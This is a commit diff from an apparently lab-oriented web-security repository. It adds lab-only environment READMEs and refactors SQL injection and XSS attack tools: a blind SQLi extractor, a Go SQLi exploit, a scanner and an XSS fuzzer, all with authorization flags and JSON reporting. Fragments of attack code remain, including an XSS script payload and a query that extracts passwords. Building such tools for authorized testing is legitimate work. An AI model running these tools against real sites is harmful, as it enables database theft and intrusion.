hao/websafe-kb
1
0
派生 0
代码 工单 合并请求 1 工作流 软件包 项目 发布 百科 活动

更新: 359 个文件 - 2026-03-16 23:30:01

浏览代码
这个提交包含在:
hao
2026-03-16 23:30:01 -07:00
父节点 527990f535
当前提交 2974cd9ad9
修改 359 个文件,包含 6332 行新增673 行删除
下载 Patch 文件 下载 Diff 文件 展开所有文件 折叠所有文件

16
00-environments/README.md 普通文件
查看文件

@@ -0,0 +1,16 @@
# 环境编排与靶站目录
> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | `非生产环境`
本目录承载授权攻防实验的本地靶站编排和复现资产,分为三层:
- `catalog/systems/`
- 每个主流开源 Web 系统的环境供应元数据、默认 artifact 模式和服务提示。
- `profiles/`
- 可执行环境 profile,按 `core/<system>/current.yaml` 存放当前默认复现入口。
- `templates/synthetic/`
- 当历史版本或扩展包无法稳定获取时使用的最小合成靶场模板。
- [catalog](/Users/x/websafe/00-environments/catalog/README.md)
- [profiles](/Users/x/websafe/00-environments/profiles/README.md)
- [synthetic templates](/Users/x/websafe/00-environments/templates/synthetic/README.md)

5
00-environments/catalog/README.md 普通文件
查看文件

@@ -0,0 +1,5 @@
# 环境 Catalog
> `LAB ONLY` | 自动生成与维护
`systems/*.yaml` 是每个系统的环境供应真值,用于决定优先走真实版本还是 synthetic 补位。

5
00-environments/profiles/README.md 普通文件
查看文件

@@ -0,0 +1,5 @@
# 环境 Profiles
> `LAB ONLY` | 自动生成与维护
`core/<system>/current.yaml` 提供每个系统当前默认的可运行 profile。后续可以按需要扩展到具体版本文件。

5
00-environments/templates/synthetic/README.md 普通文件
查看文件

@@ -0,0 +1,5 @@
# Synthetic Templates
> `LAB ONLY` | `AUTHORIZED TARGETS ONLY`
当无法稳定获取历史版本、插件包或模块工件时,允许使用最小合成靶场补位。所有 synthetic 结果都必须在案例页和 registry 中显式标注。

118
01-sql-injection/tools/blind-sqli.py
查看文件

@@ -33,6 +33,24 @@ import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Callable, Optional, List from typing import Callable, Optional, List
import sys import sys
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -332,8 +350,10 @@ def main():
) )
parser.add_argument("--true-indicator", help="布尔盲注真值指示器") parser.add_argument("--true-indicator", help="布尔盲注真值指示器")
parser.add_argument("-t", "--threads", type=int, default=1, help="线程数") parser.add_argument("-t", "--threads", type=int, default=1, help="线程数")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
@@ -344,12 +364,7 @@ def main():
k, v = pair.split("=", 1) k, v = pair.split("=", 1)
data[k] = v data[k] = v
cookies = {} cookies = parse_cookie_string(args.cookie)
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
exploit = BlindSQLi( exploit = BlindSQLi(
url=args.url, url=args.url,
@@ -360,32 +375,81 @@ def main():
delay=args.delay, delay=args.delay,
threads=args.threads, threads=args.threads,
) )
exploit.session.headers.update(parse_headers(args.header))
if args.proxy:
exploit.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
exploit._print = lambda *_args, **_kwargs: None # type: ignore[assignment]
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") result = None
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}") stdout_buffer = io.StringIO()
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
if args.query: with capture:
result = exploit.extract_string( if args.query:
args.query, args.technique, args.dbms, true_indicator=args.true_indicator result = exploit.extract_string(
) args.query, args.technique, args.dbms, true_indicator=args.true_indicator
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}") )
elif args.extract: elif args.extract:
result = exploit.auto_extract(args.extract, args.dbms, args.technique) result = exploit.auto_extract(args.extract, args.dbms, args.technique)
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
else: if args.format == "text":
print( print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}" print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
) print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
print(f"\n示例:") if args.query:
print(f" --extract user 提取当前用户") print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
print(f" --extract database 提取当前数据库") elif args.extract:
print(f" --extract version 提取数据库版本") print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
print(f' --query "SELECT password FROM users LIMIT 1"') else:
print(
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
)
print(f"\n示例:")
print(f" --extract user 提取当前用户")
print(f" --extract database 提取当前数据库")
print(f" --extract version 提取数据库版本")
print(f' --query "SELECT password FROM users LIMIT 1"')
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") evidence_refs = []
ref = write_evidence(
args,
"blind-sqli-result.json",
{
"result": result,
"captured_stdout": stdout_buffer.getvalue()[-1000:],
"technique": args.technique,
"dbms": args.dbms,
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if result else "needs-review"
severity = "high" if result else "medium"
report = make_report(
tool="blind-sqli",
mode=f"{args.technique}-blind-extraction",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"query": args.query, "extract": args.extract, "result": result},
request_summary={"param": args.param, "dbms": args.dbms, "threads": args.threads},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"Blind SQL Injection Exploit Tool",
"=" * 60,
f"Target: {args.url}",
f"Technique: {args.technique}",
f"Result Present: {'yes' if result else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":

128
01-sql-injection/tools/sqli-exploit.go
查看文件

@@ -2,11 +2,13 @@
package main package main
import ( import (
"encoding/json"
"flag" "flag"
"fmt" "fmt"
"io" "io"
"net/http" "net/http"
"net/url" "net/url"
"os"
"strings" "strings"
"sync" "sync"
"time" "time"
@@ -19,6 +21,9 @@ type SQLiExploit struct {
Param string Param string
Threads int Threads int
Timeout time.Duration Timeout time.Duration
Headers map[string]string
Cookie string
Quiet bool
} }
type InjectionResult struct { type InjectionResult struct {
@@ -51,6 +56,7 @@ func NewSQLiExploit(target, method, param string, threads int, timeout time.Dura
Param: param, Param: param,
Threads: threads, Threads: threads,
Timeout: timeout, Timeout: timeout,
Headers: map[string]string{},
} }
} }
@@ -78,6 +84,12 @@ func (s *SQLiExploit) SendRequest(payload string) (string, int, error) {
} }
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
for k, v := range s.Headers {
req.Header.Set(k, v)
}
if s.Cookie != "" {
req.Header.Set("Cookie", s.Cookie)
}
resp, err := s.Client.Do(req) resp, err := s.Client.Do(req)
if err != nil { if err != nil {
@@ -120,8 +132,10 @@ func (s *SQLiExploit) TestTimeBased(payloads []struct {
ResponseLen: respLen, ResponseLen: respLen,
}) })
mu.Unlock() mu.Unlock()
fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n", if !s.Quiet {
colorRed+colorBold, colorEnd, payload, elapsed, dbms) fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n",
colorRed+colorBold, colorEnd, payload, elapsed, dbms)
}
} }
}(p.Payload, p.DBMS, p.Delay) }(p.Payload, p.DBMS, p.Delay)
} }
@@ -159,8 +173,10 @@ func (s *SQLiExploit) TestErrorBased(payloads []struct {
DBMS: dbms, DBMS: dbms,
ResponseLen: respLen, ResponseLen: respLen,
}) })
fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n", if !s.Quiet {
colorRed+colorBold, colorEnd, p.Payload, dbms) fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n",
colorRed+colorBold, colorEnd, p.Payload, dbms)
}
break break
} }
} }
@@ -173,7 +189,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
var result strings.Builder var result strings.Builder
charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@." charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@."
fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query) if !s.Quiet {
fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query)
}
for pos := 1; pos <= maxLen; pos++ { for pos := 1; pos <= maxLen; pos++ {
found := false found := false
@@ -197,7 +215,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
if elapsed >= 900*time.Millisecond { if elapsed >= 900*time.Millisecond {
result.WriteByte(byte(char)) result.WriteByte(byte(char))
found = true found = true
fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String()) if !s.Quiet {
fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String())
}
break break
} }
} }
@@ -212,6 +232,21 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
return result.String() return result.String()
} }
func parseHeaders(raw string) map[string]string {
headers := map[string]string{}
if raw == "" {
return headers
}
for _, part := range strings.Split(raw, ",") {
pair := strings.SplitN(part, ":", 2)
if len(pair) != 2 {
continue
}
headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
}
return headers
}
func main() { func main() {
target := flag.String("u", "", "Target URL") target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)") method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -222,25 +257,27 @@ func main() {
extract := flag.String("extract", "", "Data to extract (user/database/version)") extract := flag.String("extract", "", "Data to extract (user/database/version)")
query := flag.String("query", "", "Custom SQL query") query := flag.String("query", "", "Custom SQL query")
dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)") dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)")
header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
cookie := flag.String("cookie", "", "Cookie header value")
format := flag.String("format", "text", "Output format: text or json")
output := flag.String("output", "", "Write output to file")
evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
runID := flag.String("run-id", "", "Associated run ID")
caseID := flag.String("case-id", "", "Associated case ID")
ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
flag.Parse() flag.Parse()
if *target == "" { if *target == "" || !*ackAuthorized {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage() flag.Usage()
return return
} }
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sSQL Injection Exploit Tool (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout) exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout)
exploit.Headers = parseHeaders(*header)
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) exploit.Cookie = *cookie
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method) exploit.Quiet = *format != "text"
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
fmt.Printf("%s[INFO]%s Technique: %s\n", colorBlue, colorEnd, *technique)
timePayloads := []struct { timePayloads := []struct {
Payload string Payload string
@@ -266,14 +303,12 @@ func main() {
} }
var allResults []InjectionResult var allResults []InjectionResult
fmt.Printf("\n%s[*]%s Testing Time-based Injection...\n", colorCyan, colorEnd)
timeResults := exploit.TestTimeBased(timePayloads) timeResults := exploit.TestTimeBased(timePayloads)
allResults = append(allResults, timeResults...) allResults = append(allResults, timeResults...)
fmt.Printf("\n%s[*]%s Testing Error-based Injection...\n", colorCyan, colorEnd)
errorResults := exploit.TestErrorBased(errorPayloads) errorResults := exploit.TestErrorBased(errorPayloads)
allResults = append(allResults, errorResults...) allResults = append(allResults, errorResults...)
extractedResult := ""
if *extract != "" || *query != "" { if *extract != "" || *query != "" {
var extractQuery string var extractQuery string
@@ -310,15 +345,54 @@ func main() {
} }
if extractQuery != "" { if extractQuery != "" {
result := exploit.ExtractData(extractQuery, *technique, *dbms, 100) extractedResult = exploit.ExtractData(extractQuery, *technique, *dbms, 100)
fmt.Printf("\n%s[+]%s Result: %s\n", colorGreen, colorEnd, result)
} }
} }
report := map[string]interface{}{
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) "tool": "sqli-exploit-go",
fmt.Printf("%s[SUMMARY]%s Found %d vulnerabilities\n", colorGreen, colorEnd, len(allResults)) "mode": *technique + "-probe-and-extract",
for _, r := range allResults { "target": *target,
fmt.Printf(" - [%s] %s - %s\n", r.VulnType, r.DBMS, r.Payload) "status": "needs-review",
"severity": "info",
"timestamp": time.Now().UTC().Format(time.RFC3339),
"request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads, "dbms": *dbms},
"payload_or_probe": map[string]interface{}{"hits": allResults, "extract": *extract, "query": *query, "result": extractedResult},
"evidence_refs": []string{},
"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
"authorization_scope": "lab-local, lab-public, authorized-third-party",
"destructive_risk": "medium",
"run_id": *runID,
"case_id": *caseID,
} }
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) if len(allResults) > 0 || extractedResult != "" {
report["status"] = "verified"
report["severity"] = "high"
}
if *evidenceDir != "" {
_ = os.MkdirAll(*evidenceDir, 0o755)
evidencePath := *evidenceDir + "/sqli-exploit-go.json"
if raw, err := json.MarshalIndent(report, "", " "); err == nil {
_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
}
}
var content []byte
if *format == "json" {
content, _ = json.MarshalIndent(report, "", " ")
} else {
lines := []string{
strings.Repeat("=", 60),
"SQL Injection Exploit Tool (Go)",
strings.Repeat("=", 60),
"Target: " + *target,
"Technique: " + *technique,
fmt.Sprintf("Hits: %d", len(allResults)),
"Status: " + report["status"].(string),
}
content = []byte(strings.Join(lines, "\n"))
}
if *output != "" {
_ = os.WriteFile(*output, append(content, '\n'), 0o644)
}
fmt.Println(string(content))
} }

75
01-sql-injection/tools/sqli-scanner.py
查看文件

@@ -30,6 +30,22 @@ import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -322,12 +338,19 @@ def main():
parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)") parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)")
parser.add_argument("-t", "--threads", type=int, default=5, help="线程数") parser.add_argument("-t", "--threads", type=int, default=5, help="线程数")
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
scanner = SQLiScanner(timeout=args.timeout, threads=args.threads) scanner = SQLiScanner(timeout=args.timeout, threads=args.threads)
scanner.session.headers.update(parse_headers(args.header))
if args.proxy:
scanner.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
data = {} data = {}
if args.data: if args.data:
@@ -336,32 +359,48 @@ def main():
k, v = pair.split("=", 1) k, v = pair.split("=", 1)
data[k] = v data[k] = v
cookies = {} cookies = parse_cookie_string(args.cookie)
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
params = args.params.split(",") if args.params else None params = args.params.split(",") if args.params else None
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}SQL Injection Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.url}") scanner.print_result("INFO", f"目标: {args.url}")
scanner.print_result("INFO", f"方法: {args.method}") scanner.print_result("INFO", f"方法: {args.method}")
results = scanner.scan_url(args.url, args.method, data, cookies, params) results = scanner.scan_url(args.url, args.method, data, cookies, params)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
if results: ref = write_evidence(args, "sqli-results.json", results)
scanner.print_result("SUCCESS", f"发现 {len(results)} 个SQL注入漏洞!") if ref:
for r in results: evidence_refs.append(ref)
print(f" - {r}") status = "verified" if results else "needs-review"
else: severity = "high" if results else "info"
scanner.print_result("INFO", "未发现SQL注入漏洞") report = make_report(
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") tool="sqli-scanner",
mode="non-destructive-sqli-scan",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"hits": results, "params": params or sorted(data.keys())},
request_summary={
"method": args.method,
"params": params or [],
"threads": args.threads,
"header_names": sorted(parse_headers(args.header).keys()),
},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"SQL Injection Scanner",
"=" * 60,
f"Target: {args.url}",
f"Method: {args.method}",
f"Hits: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":

95
02-xss/tools/xss-fuzzer.py
查看文件

@@ -26,6 +26,23 @@ import re
import urllib.parse import urllib.parse
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import time import time
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -345,16 +362,19 @@ def main():
"--all-categories", action="store_true", help="测试所有Payload类别" "--all-categories", action="store_true", help="测试所有Payload类别"
) )
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
fuzzer = XSSFuzzer(timeout=args.timeout) fuzzer = XSSFuzzer(timeout=args.timeout)
fuzzer.session.headers.update(parse_headers(args.header))
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") if args.proxy:
print(f"{Colors.BOLD}XSS Fuzzer{Colors.END}") fuzzer.session.proxies.update({"http": args.proxy, "https": args.proxy})
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") if args.format != "text":
fuzzer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
data = {} data = {}
if args.data: if args.data:
@@ -363,13 +383,9 @@ def main():
k, v = pair.split("=", 1) k, v = pair.split("=", 1)
data[k] = v data[k] = v
cookies = {} cookies = parse_cookie_string(args.cookie)
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
csp_result = {"has_csp": False, "weaknesses": []}
if args.check_csp: if args.check_csp:
fuzzer.print_result("INFO", "检查 CSP 策略...") fuzzer.print_result("INFO", "检查 CSP 策略...")
csp_result = fuzzer.check_csp(args.url, cookies) csp_result = fuzzer.check_csp(args.url, cookies)
@@ -384,6 +400,7 @@ def main():
for w in csp_result["weaknesses"]: for w in csp_result["weaknesses"]:
fuzzer.print_result("WARNING", f" - {w}") fuzzer.print_result("WARNING", f" - {w}")
dom_results = []
if args.dom_scan: if args.dom_scan:
fuzzer.print_result("INFO", "扫描 DOM XSS...") fuzzer.print_result("INFO", "扫描 DOM XSS...")
dom_results = fuzzer.scan_dom_xss(args.url, cookies) dom_results = fuzzer.scan_dom_xss(args.url, cookies)
@@ -396,18 +413,58 @@ def main():
fuzzer.print_result("INFO", "上下文分析:") fuzzer.print_result("INFO", "上下文分析:")
for ctx, status in context.items(): for ctx, status in context.items():
color = Colors.YELLOW if status == "未过滤" else Colors.GREEN color = Colors.YELLOW if status == "未过滤" else Colors.GREEN
print(f" {color}{ctx}: {status}{Colors.END}") if args.format == "text":
print(f" {color}{ctx}: {status}{Colors.END}")
results = fuzzer.test_reflected(args.url, args.param, args.method, data, cookies) results = fuzzer.test_reflected(args.url, args.param, args.method, data, cookies)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
if results: for name, payload in [
fuzzer.print_result("SUCCESS", f"发现 {len(results)} 个 XSS 漏洞!") ("xss-context.json", context),
for r in results: ("xss-reflected.json", results),
print(f" - [{r['category']}] {r['param']}: {r['payload'][:60]}...") ("xss-dom.json", dom_results),
else: ("xss-csp.json", csp_result),
fuzzer.print_result("INFO", "未发现反射型 XSS 漏洞") ]:
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") ref = write_evidence(args, name, payload)
if ref:
evidence_refs.append(ref)
status = "verified" if results else "suspected" if dom_results or csp_result.get("weaknesses") else "needs-review"
severity = "high" if results else "medium" if dom_results else "low" if csp_result.get("weaknesses") else "info"
report = make_report(
tool="xss-fuzzer",
mode="dom-and-reflected-xss",
target=args.url,
status=status,
severity=severity,
payload_or_probe={
"reflected_hits": results,
"dom_hits": dom_results,
"context": context,
"csp": csp_result,
},
request_summary={
"method": args.method,
"param": args.param,
"has_body_template": bool(args.data),
"header_names": sorted(parse_headers(args.header).keys()),
},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"XSS Fuzzer",
"=" * 60,
f"Target: {args.url}",
f"Method: {args.method}",
f"Param: {args.param}",
f"Reflected Hits: {len(results)}",
f"DOM Findings: {len(dom_results)}",
f"CSP Weaknesses: {len(csp_result.get('weaknesses', []))}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":

129
02-xss/tools/xss-scanner.go
查看文件

@@ -7,11 +7,13 @@
package main package main
import ( import (
"encoding/json"
"flag" "flag"
"fmt" "fmt"
"io" "io"
"net/http" "net/http"
"net/url" "net/url"
"os"
"regexp" "regexp"
"strings" "strings"
"sync" "sync"
@@ -30,6 +32,9 @@ type XSSScanner struct {
Threads int Threads int
Timeout time.Duration Timeout time.Duration
Payloads map[string][]string Payloads map[string][]string
Headers map[string]string
Cookie string
Quiet bool
} }
var ( var (
@@ -52,6 +57,7 @@ func NewXSSScanner(threads int, timeout time.Duration) *XSSScanner {
}, },
Threads: threads, Threads: threads,
Timeout: timeout, Timeout: timeout,
Headers: map[string]string{},
Payloads: map[string][]string{ Payloads: map[string][]string{
"basic": { "basic": {
"<script>alert(1)</script>", "<script>alert(1)</script>",
@@ -110,6 +116,12 @@ func (s *XSSScanner) SendRequest(targetURL, method, param, payload string) (stri
} }
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
for k, v := range s.Headers {
req.Header.Set(k, v)
}
if s.Cookie != "" {
req.Header.Set("Cookie", s.Cookie)
}
resp, err := s.Client.Do(req) resp, err := s.Client.Do(req)
if err != nil { if err != nil {
@@ -150,8 +162,10 @@ func (s *XSSScanner) ScanURL(targetURL, method, param string) []XSSResult {
Category: cat, Category: cat,
}) })
mu.Unlock() mu.Unlock()
fmt.Printf("%s[VULN]%s [%s] %s - %s\n", if !s.Quiet {
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))]) fmt.Printf("%s[VULN]%s [%s] %s - %s\n",
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))])
}
} }
}(category, payload) }(category, payload)
} }
@@ -234,6 +248,21 @@ func min(a, b int) int {
return b return b
} }
func parseHeaders(raw string) map[string]string {
headers := map[string]string{}
if raw == "" {
return headers
}
for _, part := range strings.Split(raw, ",") {
pair := strings.SplitN(part, ":", 2)
if len(pair) != 2 {
continue
}
headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
}
return headers
}
func main() { func main() {
target := flag.String("u", "", "Target URL") target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)") method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -242,53 +271,105 @@ func main() {
timeout := flag.Duration("timeout", 10*time.Second, "Request timeout") timeout := flag.Duration("timeout", 10*time.Second, "Request timeout")
checkCSP := flag.Bool("check-csp", false, "Check CSP headers") checkCSP := flag.Bool("check-csp", false, "Check CSP headers")
domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS") domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS")
header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
cookie := flag.String("cookie", "", "Cookie header value")
format := flag.String("format", "text", "Output format: text or json")
output := flag.String("output", "", "Write output to file")
evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
runID := flag.String("run-id", "", "Associated run ID")
caseID := flag.String("case-id", "", "Associated case ID")
ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
flag.Parse() flag.Parse()
if *target == "" { if *target == "" || !*ackAuthorized {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage() flag.Usage()
return return
} }
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sXSS Scanner (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
scanner := NewXSSScanner(*threads, *timeout) scanner := NewXSSScanner(*threads, *timeout)
scanner.Headers = parseHeaders(*header)
scanner.Cookie = *cookie
scanner.Quiet = *format != "text"
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) cspResult := map[string]interface{}{"has_csp": false, "weaknesses": []string{}}
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method)
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
if *checkCSP { if *checkCSP {
fmt.Printf("\n%s[*]%s Checking CSP...\n", colorCyan, colorEnd) cspResult = scanner.CheckCSP(*target)
cspResult := scanner.CheckCSP(*target) if *format == "text" && cspResult["has_csp"].(bool) {
if cspResult["has_csp"].(bool) {
fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))]) fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))])
for _, w := range cspResult["weaknesses"].([]string) { for _, w := range cspResult["weaknesses"].([]string) {
fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w) fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w)
} }
} else { } else if *format == "text" {
fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd) fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd)
} }
} }
domResults := []map[string]string{}
if *domScan { if *domScan {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd) domResults = scanner.ScanDOMXSS(*target)
domResults := scanner.ScanDOMXSS(*target) if *format == "text" {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd)
}
for _, r := range domResults { for _, r := range domResults {
if *format != "text" {
continue
}
fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"]) fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"])
} }
} }
fmt.Printf("\n%s[*]%s Testing XSS payloads...\n", colorCyan, colorEnd)
results := scanner.ScanURL(*target, *method, *param) results := scanner.ScanURL(*target, *method, *param)
report := map[string]interface{}{
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) "tool": "xss-scanner-go",
fmt.Printf("%s[SUMMARY]%s Found %d XSS vulnerabilities\n", colorGreen, colorEnd, len(results)) "mode": "bulk-reflected-xss",
